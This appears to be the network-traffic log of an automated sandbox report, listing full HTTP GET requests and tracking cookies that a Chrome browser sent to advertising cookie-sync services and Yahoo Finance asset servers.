IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=pubmatic&google_hm=MTc2NjgyQTgtRTEyMS00NEE3LTgxOEQtNEZFNTNENTQyQkIy&gdpr=0&gdpr_consent= HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /xuid?mid=2662&xuid=y-B5gCAc9E2oTPbKbUs8YZwFQXu8mxBgMirWK046Y6SQ--~A&dongle=0883 HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluidp=3811239664715375770435; tluid=3811239664715375770435
Source: global trafficHTTP traffic detected: GET /pubmatic/1/info?sType=sync&sExtCookieId=176682A8-E121-44A7-818D-4FE53D542BB2&sInitiator=external&gdpr=0&gdpr_consent= HTTP/1.1Host: uipglob.semasio.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: SEUNCY=8B22F39EC31AE5F8
Source: global trafficHTTP traffic detected: GET /v000/sync?tdid=07c89b85-4c1c-424d-8df0-0123ed6cebb6 HTTP/1.1Host: ads.yieldmo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yieldmo_id=VRLAoLL__uL1ewyIa5Iq%7C1727654400000%7C0; re_sync=rc%3D1200643%7Cunl%3D1200643%7Ct%3D1200643%7Cpub%3D1200643%7Can%3D1200643; ptran=7992184014990425658
Source: global trafficHTTP traffic detected: GET /AdServer/ImgSync?p=160648&gdpr=&gdpr_consent=&pu=https%3A%2F%2Fimage4.pubmatic.com%2FAdServer%2FSPug%3Fp%3D160648%26pmc%3DPM_PMC%26pr%3Dhttps%253A%252F%252Fsync-pm.ads.yieldmo.com%252Fsync%253Fpn_id%253Dpub%2526id%253D%2523PMUID%2526gdpr%253DPM_GDPR%2526gdpr_consent%253DPM_CONSENT&rdf=1 HTTP/1.1Host: image8.pubmatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: KADUSERCOOKIE=176682A8-E121-44A7-818D-4FE53D542BB2; chkChromeAb67Sec=1; pi=133799:2; DPSync4=1728864000%3A245_241_227_226; SyncRTB4=1728259200%3A223%7C1728864000%3A220_13_251_54_71_3_21_201_56; KTPCACOOKIE=YES
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=pubmatic&google_cm&google_sc&gdpr=0&gdpr_consent= HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=pmeb&google_sc=1&google_hm=F2aCqOEhRKeBjU_lPVQrsg%3D%3D&gdpr=0&gdpr_consent= HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /setuid?bidder=adobe&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=ZvreFAAGJeTfkQAF&_test=ZvreFAAGJeTfkQAF HTTP/1.1Host: pbs.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; uids=eyJ0ZW1wVUlEcyI6eyJpeCI6eyJ1aWQiOiJadnJlRU5ITTZJNEFBQXlxQURvMmt3QUFBX0lBQUFJQiIsImV4cGlyZXMiOiIyMDI0LTEwLTE0VDE3OjIxOjIyLjQxMDIyNTg2NFoifX19
Source: global trafficHTTP traffic detected: GET /usersync/turn/2933697492337752915?dspret=1&gdpr=&gdpr_consent=&us_privacy= HTTP/1.1Host: sync.1rx.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _rxuuid=%7B%22rx_uuid%22%3A%22RX-3fef85e6-bbf0-409a-a376-6c1ad497756a-003%22%2C%22zdxidn%22%3A%222069.28%22%2C%22nxtrdr%22%3Afalse%7D
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-autocomplete-1.31.8-modern-a4f31e10ae.chunk.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pubmatic?https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODA2JnRsPTUxODQwMA==&piggybackCookie=uid:$UID&gdpr=0&gdpr_consent= HTTP/1.1Host: um.simpli.fiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /qmap?c=240&tp=PUBM&tpid=176682A8-E121-44A7-818D-4FE53D542BB2&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.crwdcntrl.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v000/sync?extinit=0&userid=7992184014990425658&pn_id=an HTTP/1.1Host: ads.yieldmo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yieldmo_id=VRLAoLL__uL1ewyIa5Iq%7C1727654400000%7C0; re_sync=rc%3D1200643%7Cunl%3D1200643%7Ct%3D1200643%7Cpub%3D1200643%7Can%3D1200643; ptran=7992184014990425658
Source: global trafficHTTP traffic detected: GET /sync/openx/1d1d5d09-d0b5-a85e-6fc0-6f55ed82d00e?gdpr=0 HTTP/1.1Host: pr-bh.ybp.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /user-sync?zone=220412&t=image&gdpr=0&gdpr_consent=&us_privacy=1YNN&r=https%3A%2F%2Fssp.disqus.com%2Fmatch%3Fbidder%3D41%26buyeruid%3D%7BUID%7D%26r%3DCid1YS0yMjRkYmJhZS04MWU4LTM4N2YtODczZC05OTI5YjFjYmU5NjQiBDFZTk4qjAFodHRwczovL3Bicy55YWhvby5jb20vc2V0dWlkP2JpZGRlcj16ZXRhX2dsb2JhbF9zc3AmZ2Rwcj0wJmdkcHJfY29uc2VudD0mZ3BwPURCQUEmZ3BwX3NpZD0tMSZmPWkmdWlkPXVhLTIyNGRiYmFlLTgxZTgtMzg3Zi04NzNkLTk5MjliMWNiZTk2NDICKSE4AQ== HTTP/1.1Host: sync.adkernel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync/rubicon/rzuFKQgJxzTa8NmtEp9pmA?csrc=&gdpr=0&us_privacy=1YNN HTTP/1.1Host: pr-bh.ybp.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eus.rubiconproject.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /xuid?mid=2319&xuid=0-44ef61b2-fe37-563b-497a-08aac775d996$ip$8.46.123.33&dongle=4430 HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluidp=3811239664715375770435; tluid=3811239664715375770435
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Footer.BvGH1Mdb.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/MarketsNavBar.CIf_21Zk.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /setuid?bidder=ttd&uid=07c89b85-4c1c-424d-8df0-0123ed6cebb6&gdpr=0&gdpr_consent= HTTP/1.1Host: pbs.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; uids=eyJ0ZW1wVUlEcyI6eyJpeCI6eyJ1aWQiOiJadnJlRU5ITTZJNEFBQXlxQURvMmt3QUFBX0lBQUFJQiIsImV4cGlyZXMiOiIyMDI0LTEwLTE0VDE3OjIxOjIyLjQxMDIyNTg2NFoifX19
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/NavBar.CJPoP-H9.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=7992184014990425658&gdpr=0&gdpr_consent= HTTP/1.1Host: simage2.pubmatic.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: KADUSERCOOKIE=176682A8-E121-44A7-818D-4FE53D542BB2; chkChromeAb67Sec=1; pi=133799:2; DPSync4=1728864000%3A245_241_227_226; SyncRTB4=1728259200%3A223%7C1728864000%3A220_13_251_54_71_3_21_201_56; KTPCACOOKIE=YES
